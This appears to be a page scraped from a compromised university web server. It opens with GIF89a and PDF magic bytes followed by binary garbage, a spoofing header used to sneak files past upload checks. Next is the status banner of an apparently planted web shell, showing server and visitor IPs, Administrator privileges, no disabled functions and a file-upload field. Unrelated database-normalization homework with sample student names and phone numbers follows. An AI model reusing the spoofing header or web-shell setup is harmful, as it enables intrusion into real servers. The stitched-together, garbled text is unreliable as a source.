GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/uploads/20245/CST1600/41/16459598/Lab07/ |
Upload File : |
UNF: student(Name, HomeMobilePhoneNumbers, StudentID, MajorCode1, MajorCode2, MajorCode3) 1NF: student(StudentID*, First_Name, Last_Name, Home_Phone, Mobile_Phone, MajorCodes) [Made StudentID the primary key. Changed Name to First_Name and Last_Name. Changed HomeMobilePhoneNumbers to Home_Phone, Mobile_Phone. Replaced all MajorCode# with MajorCodes. 2NF: student(StudentID*, First_Name, Last_Name) Info(StudentID@, MajorCodes, Home_Phone, Mobile_Phone) [Created table info and moved MajorCodes, Home_Phone, Mobile_Phone into it.] 3NF: student(StudentID*, First_Name, Last_Name) Info(StudentID@, Home_Phone, Mobile_Phone) Majors(StudentID@, MajorCodes [Created table Majors and moved MajorCodes into it.] Three data rows: student(StudentID*, First_Name, Last_Name) 34673656 Avram Hinton 83681840 Hayes Gibson 94086534 Kristen Acosta Info(StudentID@, Home_Phone, Mobile_Phone) 34673656 103-391-7811 676-683-6301 83681840 447-149-5334 94086534 ;972-658-1570 Majors(StudentID@, MajorCodes 34673656 NSA 34673656 CSS 34673656 CST 83681840 CST 94086534 CP 94086534 MAD